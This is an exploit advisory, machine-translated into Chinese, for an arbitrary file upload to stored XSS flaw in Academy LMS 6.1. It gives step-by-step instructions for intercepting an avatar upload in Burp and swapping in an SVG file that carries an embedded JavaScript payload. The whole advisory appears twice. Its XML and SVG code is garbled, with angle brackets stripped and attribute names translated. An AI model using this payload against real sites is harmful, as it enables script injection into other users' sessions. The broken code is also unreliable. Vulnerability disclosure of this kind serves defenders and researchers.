#利用标题:学院LMS 6.1-任意文件上传
#利用作者:饼干
#日期: 05/08/2023
#vendor: CreativeItem
#供应商HomePage3360 https://academylms.net/
#软件link: https://demo.academylms.net/
#版本: 6.1
#测试在: Windows 10 Pro
#Impact:允许用户将文件上传到Web服务器
#CWE: CWE-79-CWE-74-CWE-707
## 描述
允许攻击者将恶意文件上传到服务器,例如存储的XSS
##复制步骤:
1。登录为[普通用户]
2。在[用户仪表板]中,转到此路径上的[配置文件设置] : https://website/dashboard/#/settings
3。将任何图像上传到[avatar]
4。用[burp代理拦截]捕获邮政请求
5。编辑文件扩展名为.svg注入您的[邪恶代码]或[存储的XSS]
----------------------------------------------------------------------------------------
post/wp-admin/async-upload.php http/2
----------------------------------------------------------------------------------------
content-disposition: form-data; name='async-upload';文件名='ahacka.svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报('xss by Cracker');
/脚本
/svg
----------------------------------------------------------------------------------------
6。发送请求
7。从[burp logger]捕获Get请求,以获取上载[Stored-XSS]的路径
8。在此路径上访问您的邪恶文件: https://website/wp-content/uploads/***/**/*****。
[-] 完毕
#利用作者:饼干
#日期: 05/08/2023
#vendor: CreativeItem
#供应商HomePage3360 https://academylms.net/
#软件link: https://demo.academylms.net/
#版本: 6.1
#测试在: Windows 10 Pro
#Impact:允许用户将文件上传到Web服务器
#CWE: CWE-79-CWE-74-CWE-707
## 描述
允许攻击者将恶意文件上传到服务器,例如存储的XSS
##复制步骤:
1。登录为[普通用户]
2。在[用户仪表板]中,转到此路径上的[配置文件设置] : https://website/dashboard/#/settings
3。将任何图像上传到[avatar]
4。用[burp代理拦截]捕获邮政请求
5。编辑文件扩展名为.svg注入您的[邪恶代码]或[存储的XSS]
----------------------------------------------------------------------------------------
post/wp-admin/async-upload.php http/2
----------------------------------------------------------------------------------------
content-disposition: form-data; name='async-upload';文件名='ahacka.svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报('xss by Cracker');
/脚本
/svg
----------------------------------------------------------------------------------------
6。发送请求
7。从[burp logger]捕获Get请求,以获取上载[Stored-XSS]的路径
8。在此路径上访问您的邪恶文件: https://website/wp-content/uploads/***/**/*****。
[-] 完毕